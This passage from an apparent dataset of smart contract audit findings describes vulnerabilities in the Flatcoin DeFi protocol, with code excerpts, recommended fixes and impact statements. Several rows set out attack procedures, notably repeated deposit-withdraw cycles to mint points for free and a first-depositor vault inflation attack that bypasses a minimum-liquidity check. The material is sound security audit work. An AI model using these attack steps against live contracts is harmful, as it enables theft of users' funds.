The price should be set to the current price instead, and not the position's last price.\\n```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nThe reason why the `updateGlobalPositionData` function expects a current price to be passed in is that within the `PerpMath._profitLossTotal` function, it will compute the price shift between the current price and the last price to obtain the PnL of all the open positions. 
Also, per the comment at Line 170 below, it expects the current price of the collateral to be passed in.\\nThus, it is incorrect to pass in the individual position's last/entry price, which is usually the price of the collateral when the position was first opened or adjusted some time ago.\\nThus, if the last/entry price of the liquidated position is higher than the current price of collateral, the PnL will be inflated, indicating more gain for the long traders. Since this is a zero-sum game, this also means that the LP loses more assets than expected due to the inflated gain of the long traders.\\n```\\nFile: FlatcoinVault.sol\\n /// @notice Function to update the global position data.\\n /// @dev This function is only callable by the authorized modules.\\n /// @param _price The current price of the underlying asset.\\n /// @param _marginDelta The change in the margin deposited total.\\n /// @param _additionalSizeDelta The change in the size opened total.\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the 
`marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n```\\n","Use the current price instead of liquidated position's last price when update the global position data\\n```\\n(uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n..SNIP..\\nvault.updateGlobalPositionData({\\n// Remove the line below\\n price: position.lastPrice,\\n// Add the line below\\n price: currentPrice, \\n marginDelta: // Remove the line below\\n(int256(position.marginDeposited) // Add the line below\\n positionSummary.accruedFunding),\\n additionalSizeDelta: // Remove the line below\\nint256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n});\\n```\\n",Loss of assets for the LP as mentioned in the above section.,"```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert 
FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n" +Long trader's deposited margin can be wiped out,high,"Long Trader's deposited margin can be wiped out due to a logic error, leading to a loss of assets.\\n```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n\\nIssue 1\\nAssume that there are two long positions in the system and the `_globalPositions.marginDepositedTotal` is $X$.\\nAssume that the funding fees accrued to the long positions at Line 228 is $Y$. $Y$ is a positive value indicating the overall gain/profit that the long traders received from the LPs.\\nIn this case, the `_globalPositions.marginDepositedTotal` should be set to $(X + Y)$ after taking into consideration the funding fee gain/profit accrued by the long positions.\\nHowever, in this scenario, $X < Y$. 
Thus, the condition at Line 232 will be evaluated as `false,` and the `_globalPositions.marginDepositedTotal` will be set to zero. This effectively wipes out all the margin collateral deposited by the long traders in the system, and the deposited margin of the long traders is lost.\\nIssue 2\\nThe second issue with the current implementation is that it does not accurately capture scenarios where the addition of `_globalPositions.marginDepositedTotal` and `_fundingFees` result in a negative number. This is because `_fundingFees` could be a large negative number that, when added to `_globalPositions.marginDepositedTotal`, results in a negative total, but the condition at Line 232 above still evaluates as true, resulting in an underflow revert.","If the intention is to ensure that `_globalPositions.marginDepositedTotal` will never become negative, consider summing up $(X + Y)$ first and determine if the result is less than zero. If yes, set the `_globalPositions.marginDepositedTotal` to zero.\\nThe following is the pseudocode:\\n```\\nnewMarginTotal = globalPositions.marginDepositedTota + _fundingFees;\\nglobalPositions.marginDepositedTotal = newMarginTotal > 0 ? uint256(newMarginTotal) : 0;\\n```\\n",Loss of assets for the long traders as mentioned above.,"```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? 
uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n" +Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust,medium,"Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust.\\nWhen user withdrawal from the stable LP, vault total stable collateral is updated:\\n```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n\\nThen _withdrawFee is calculated and checkSkewMax(...) function is called to ensure that the system will not be too skewed towards longs:\\n```\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n```\\n\\nAt the end of the execution, vault collateral is settled again with withdrawFee, keeper receives keeperFee and `(amountOut - totalFee)` amount of collaterals are transferred to the user:\\n```\\n // include the fees here to check for slippage\\n amountOut -= totalFee;\\n\\n if (amountOut < stableWithdraw.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(amountOut, stableWithdraw.minAmountOut);\\n\\n // Settle the collateral\\n vault.updateStableCollateralTotal(int256(withdrawFee)); // pay the withdrawal fee to stable LPs\\n vault.sendCollateral({to: msg.sender, amount: order.keeperFee}); // pay the keeper their fee\\n vault.sendCollateral({to: account, amount: amountOut}); // transfer remaining amount to the trader\\n```\\n\\nThe `totalFee` is composed of keeper fee and withdrawal fee:\\n```\\n uint256 totalFee = order.keeperFee + withdrawFee;\\n```\\n\\nThis means withdrawal fee is still in the vault, however this fee is ignored when checks skew max and protocol may revert on a safe withdrawal. 
Consider the following scenario:\\nskewFractionMax is `120%` and stableWithdrawFee is 1%;\\nAlice deposits `100` collateral and Bob opens a leverage position with size 100;\\nAt the moment, there is `100` collaterals in the Vault, skew is `0` and skew fraction is 100%;\\nAlice tries to withdraw `16.8` collaterals, withdrawFee is `0.168`, after withdrawal, it is expected that there is `83.368` stable collaterals in the Vault, so skewFraction should be `119.95%`, which is less than skewFractionMax;\\nHowever, the withdrawal will actually fail because when protocol checks skew max, withdrawFee is ignored and the skewFraction turns out to be `120.19%`, which is higher than skewFractionMax.\\nThe same issue may occur when protocol executes a leverage open and leverage adjust, in both executions, tradeFee is ignored when checks skew max.\\nPlease see the test codes:\\n```\\n function test_audit_withdraw_fee_ignored_when_checks_skew_max() public {\\n // skewFractionMax is 120%\\n uint256 skewFractionMax = vaultProxy.skewFractionMax();\\n assertEq(skewFractionMax, 120e16);\\n\\n // withdraw fee is 1%\\n vm.prank(vaultProxy.owner());\\n stableModProxy.setStableWithdrawFee(1e16);\\n\\n uint256 collateralPrice = 1000e8;\\n\\n uint256 depositAmount = 100e18;\\n announceAndExecuteDeposit({\\n traderAccount: alice,\\n keeperAccount: keeper,\\n depositAmount: depositAmount,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n uint256 additionalSize = 100e18;\\n announceAndExecuteLeverageOpen({\\n traderAccount: bob,\\n keeperAccount: keeper,\\n margin: 50e18,\\n additionalSize: 100e18,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n // After leverage Open, skew is 0\\n int256 skewAfterLeverageOpen = vaultProxy.getCurrentSkew();\\n assertEq(skewAfterLeverageOpen, 0);\\n // skew fraction is 100%\\n uint256 skewFractionAfterLeverageOpen = getLongSkewFraction();\\n assertEq(skewFractionAfterLeverageOpen, 1e18);\\n\\n // Note: comment out 
`vault.checkSkewMax({additionalSkew: 0})` and below lines to see the actual skew fraction\\n // Alice withdraws 16.8 collateral\\n // uint256 aliceLpBalance = stableModProxy.balanceOf(alice);\\n // announceAndExecuteWithdraw({\\n // traderAccount: alice, \\n // keeperAccount: keeper, \\n // withdrawAmount: 168e17, \\n // oraclePrice: collateralPrice, \\n // keeperFeeAmount: 0\\n // });\\n\\n // // After withdrawal, the actual skew fraction is 119.9%, less than skewFractionMax\\n // uint256 skewFactionAfterWithdrawal = getLongSkewFraction();\\n // assertEq(skewFactionAfterWithdrawal, 1199501007580846367);\\n\\n // console2.log(WETH.balanceOf(address(vaultProxy)));\\n }\\n```\\n",Include withdrawal fee / trade fee when check skew max.,Protocol may wrongly prevent a Stable Withdrawal / Leverage Open / Leverage Adjust even if the execution is essentially safe.,```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n +"In LeverageModule.executeOpen/executeAdjust, vault.checkSkewMax should be called after updating the global position data",medium,"```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n\\nWhen `profitLossTotal` is positive value, then `stableCollateralTotal` will decrease.\\nWhen `profitLossTotal` is negative value, then `stableCollateralTotal` will increase.\\nAssume the following:\\n```\\nstableCollateralTotal = 
90e18\\n_globalPositions = { \\n sizeOpenedTotal: 100e18, \\n lastPrice: 1800e18, \\n}\\nA new position is to be opened with additionalSize = 5e18. \\nfresh price=2000e18\\n```\\n\\nWe explain it in two situations:\\n`checkSkewMax` is called before `updateGlobalPositionData`.\\n```\\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 90e18 \\n = 1.16667e18 < skewFractionMax(1.2e18)\\nso checkSkewMax will be passed.\\n```\\n\\n`checkSkewMax` is called after `updateGlobalPositionData`.\\n```\\nIn updateGlobalPositionData: \\nPerpMath._profitLossTotal calculates\\nprofitLossTotal = _globalPositions.sizeOpenedTotal * (int256(price) - int256(globalPosition.lastPrice)) / int256(price) \\n = 100e18 * (2000e18 - 1800e18) / 2000e18 = 100e18 * 200e18 /2000e18 \\n = 10e18 \\n_updateStableCollateralTotal(-profitLossTotal) will deduct 10e18 from stableCollateralTotal. \\nso stableCollateralTotal = 90e18 - 10e18 = 80e18. 
\\n\\nNow, checkSkewMax is called: \\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 80e18 \\n = 1.3125e18 > skewFractionMax(1.2e18)\\n```\\n\\nTherefore, this new position should not be allowed to open, as this will only make the system more skewed towards the long side.","```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:--- vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n+++ vault.checkSkewMax(0); //0 means that vault.updateGlobalPositionData has added announcedOpen.additionalSize.\\n// rest of code// rest of code\\n }\\n```\\n","The `stableCollateralTotal` used by `checkSkewMax` is the value of the total profit that has not yet been settled, which is old value. 
In this way, when the price of collateral rises, it will cause the system to be more skewed towards the long side.","```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n" +Oracle will not failover as expected during liquidation,medium,"Oracle will not failover as expected during liquidation. If the liquidation cannot be executed due to the revert described in the following scenario, underwater positions and bad debt accumulate in the protocol, threatening the solvency of the protocol.\\nThe liquidators have the option to update the Pyth price during liquidation. 
If the liquidators do not intend to update the Pyth price during liquidation, they have to call the second `liquidate(uint256 tokenId)` function at Line 85 below directly, which does not have the `updatePythPrice` modifier.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n\\nIt was understood from the protocol team that the rationale for allowing the liquidators to execute a liquidation without updating the Pyth price is to ensure that the liquidations will work regardless of Pyth's working status, in which case Chainlink is the fallback, and the last oracle price will be used for the liquidation.\\nHowever, upon further review, it was found that the fallback mechanism within the FlatCoin protocol does not work as expected by the protocol team.\\nAssume that Pyth is down. In this case, no one would be able to fetch the latest off-chain price from Pyth network and update Pyth on-chain contract. As a result, the prices stored in the Pyth on-chain contract will become outdated and stale.\\nWhen liquidation is executed in FlatCoin protocol, the following `_getPrice` function will be executed to fetch the price. Line 107 below will fetch the latest price from Chainlink, while Line 108 below will fetch the last available price on the Pyth on-chain contract. 
When the Pyth on-chain prices have not been updated for a period of time, the deviation between `onchainPrice` and `offchainPrice` will widen till a point where `diffPercent > maxDiffPercent` and a revert will occur at Line 113 below, thus blocking the liquidation from being carried out. As a result, the liquidation mechanism within the FlatCoin protocol will stop working.\\nAlso, the protocol team's goal of allowing the liquidators to execute a liquidation without updating the Pyth price to ensure that the liquidations will work regardless of Pyth's working status will not be achieved.\\n```\\nFile: OracleModule.sol\\n /// @notice Returns the latest 18 decimal price of asset from either Pyth.network or Chainlink.\\n /// @dev It verifies the Pyth network price against Chainlink price (ensure that it is within a threshold).\\n /// @return price The latest 18 decimal price of asset.\\n /// @return timestamp The timestamp of the latest price.\\n function _getPrice(uint32 maxAge) internal view returns (uint256 price, uint256 timestamp) {\\n (uint256 onchainPrice, uint256 onchainTime) = _getOnchainPrice(); // will revert if invalid\\n (uint256 offchainPrice, uint256 offchainTime, bool offchainInvalid) = _getOffchainPrice();\\n bool offchain;\\n\\n uint256 priceDiff = (int256(onchainPrice) - int256(offchainPrice)).abs();\\n uint256 diffPercent = (priceDiff * 1e18) / onchainPrice;\\n if (diffPercent > maxDiffPercent) revert FlatcoinErrors.PriceMismatch(diffPercent);\\n\\n if (offchainInvalid == false) {\\n // return the freshest price\\n if (offchainTime >= onchainTime) {\\n price = offchainPrice;\\n timestamp = offchainTime;\\n offchain = true;\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n\\n // Check that the timestamp is within the required age\\n if (maxAge < type(uint32).max && timestamp + maxAge < block.timestamp) {\\n revert FlatcoinErrors.PriceStale(\\n offchain ? 
FlatcoinErrors.PriceSource.OffChain : FlatcoinErrors.PriceSource.OnChain\\n );\\n }\\n }\\n```\\n",Consider implementing a feature to allow the protocol team to disable the price deviation check so that the protocol team can disable it in the event that Pyth network is down for an extended period of time.,"The liquidation mechanism is the core component of the protocol and is important to the solvency of the protocol. If the liquidation cannot be executed due to the revert described in the above scenario, underwater positions and bad debt accumulate in the protocol threaten the solvency of the protocol.","```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n" +Large amounts of points can be minted virtually without any cost,medium,"Large amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value and create unfairness among other protocol users.\\nWhen depositing stable collateral, the LPs only need to pay for the keeper fee. The keeper fee will be sent to the caller who executed the deposit order.\\nWhen withdrawing stable collateral, the LPs need to pay for the keeper fee and withdraw fee. However, there is an instance where one does not need to pay for the withdrawal fee. 
Per the condition at Line 120 below, if the `totalSupply` is zero, this means that it is the final/last withdrawal. In this case, the withdraw fee will not be applicable and remain at zero.\\n```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n\\nWhen LPs deposit rETH and mint UNIT, the protocol will mint points to the depositor's account as per Line 84 below.\\nAssume that the vault has been newly deployed on-chain. Bob is the first LP to deposit rETH into the vault. 
Assume for a period of time (e.g., around 30 minutes), there are no other users depositing into the vault except for Bob.\\nBob could perform the following actions to mint points for free:\\nBob announces a deposit order to deposit 100e18 rETH. Paid for the keeper fee. (Acting as a LP).\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the deposit order and mints 100e18 UNIT (Exchange rate 1:1). Protocol also mints 100e18 points to Bob's account. Bob gets back the keeper fee. (Acting as Keeper)\\nImmediately after his `executeDeposit` TX, Bob inserts an ""announce withdraw order"" TX to withdraw all his 100e18 UNIT and pay for the keeper fee.\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the withdraw order and receives back his initial investment of 100e18 rETH. Since he is the only LP in the protocol, it is considered the final/last withdrawal, and he does not need to pay any withdraw fee. He also got back his keeper fee. (Acting as Keeper)\\nEach attack requires 20 seconds (10 + 10) to be executed. Bob could rinse and repeat the attack until he was no longer the only LP in the system, where he had to pay for the withdraw fee, which might make this attack unprofitable.\\nIf Bob is the only LP in the system for 30 minutes, he could gain 9000e18 points ((30 minutes / 20 seconds) * 100e18 ) for free as Bob could get back his keeper fee and does not incur any withdraw fee. 
The only thing that Bob needs to pay for is the gas fee, which is extremely cheap on L2 like Base.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n..SNIP..\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n..SNIP..\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n..SNIP..\\n // Mint points\\n IPointsModule pointsModule = IPointsModule(vault.moduleAddress(FlatcoinModuleKeys._POINTS_MODULE_KEY));\\n pointsModule.mintDeposit(_account, _announcedDeposit.depositAmount);\\n```\\n","One approach that could mitigate this risk is also to impose withdraw fee for the final/last withdrawal so that no one could abuse this exception to perform any attack that was once not profitable due to the need to pay withdraw fee.\\nIn addition, consider deducting the points once a position is closed or reduced in size so that no one can attempt to open and adjust/close a position repeatedly to obtain more points.","Large amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. 
A malicious user could abuse this to obtain a large number of points, which could obtain excessive value from the protocol and create unfairness among other protocol users.","```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n" +Vault Inflation Attack,medium,"Malicious users can perform an inflation attack against the vault to steal the assets of the victim.\\nA malicious user can perform a donation to execute a classic first depositor/ERC4626 inflation Attack against the FlatCoin vault. 
The general process of this attack is well-known, and a detailed explanation of this attack can be found in many of the resources such as the following:\\nIn short, to kick-start the attack, the malicious user will often usually mint the smallest possible amount of shares (e.g., 1 wei) and then donate significant assets to the vault to inflate the number of assets per share. Subsequently, it will cause a rounding error when other users deposit.\\nHowever, in Flatcoin, there are various safeguards in place to mitigate this attack. Thus, one would need to perform additional steps to workaround/bypass the existing controls.\\nLet's divide the setup of the attack into two main parts:\\nMalicious user mint 1 mint of share\\nDonate or transfer assets to the vault to inflate the assets per share\\nPart 1 - Malicious user mint 1 mint of share\\nUsers could attempt to mint 1 wei of share. However, the validation check at Line 79 will revert as the share minted is less than `MIN_LIQUIDITY` = 10_000. 
However, this minimum liquidation requirement check can be bypassed.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n\\nFirst, Bob mints 10000 wei shares via `executeDeposit` function. Next, Bob withdraws 9999 wei shares via the `executeWithdraw`. In the end, Bob successfully owned only 1 wei share, which is the prerequisite for this attack.\\nPart 2 - Donate or transfer assets to the vault to inflate the assets per share\\nThe vault tracks the number of collateral within the state variables. Thus, simply transferring rETH collateral to the vault directly will not work, and the assets per share will remain the same.\\nTo work around this, Bob creates a large number of accounts (with different wallet addresses). He could choose any or both of the following methods to indirectly transfer collateral to the LP pool/vault to inflate the assets per share:\\nOpen a large number of leveraged long positions with the intention of incurring large amounts of losses. 
The long positions' losses are the gains of the LPs, and the collateral per share will increase.\\nOpen a large number of leveraged long positions till the max skew of 120%. Thus, this will cause the funding rate to increase, and the long will have to pay the LPs, which will also increase the collateral per share.\\nTriggering rounding error\\nThe `stableCollateralPerShare` will be inflated at this point. Following is the formula used to determine the number of shares minted to the depositor.\\nIf the `depositAmount` by the victim is not sufficiently large enough, the amount of shares minted to the depositor will round down to zero.\\n```\\n_collateralPerShare = (stableBalance * (10 ** decimals())) / totalSupply;\\n_liquidityMinted = (depositAmount * (10 ** decimals())) / _collateralPerShare\\n```\\n\\nFinally, the attacker withdraws their share from the pool. Since they are the only ones with any shares, this withdrawal equals the balance of the vault. This means the attacker also withdraws the tokens deposited by the victim earlier.","A `MIN_LIQUIDITY` amount of shares needs to exist within the vault to guard against a common inflation attack.\\nHowever, the current approach of only checking if the `totalSupply() < MIN_LIQUIDITY` is not sufficient, and could be bypassed by making use of the withdraw function.\\nA more robust approach to ensuring that there is always a minimum number of shares to guard against inflation attack is to mint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2).",Malicious users could steal the assets of the victim.,"```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata 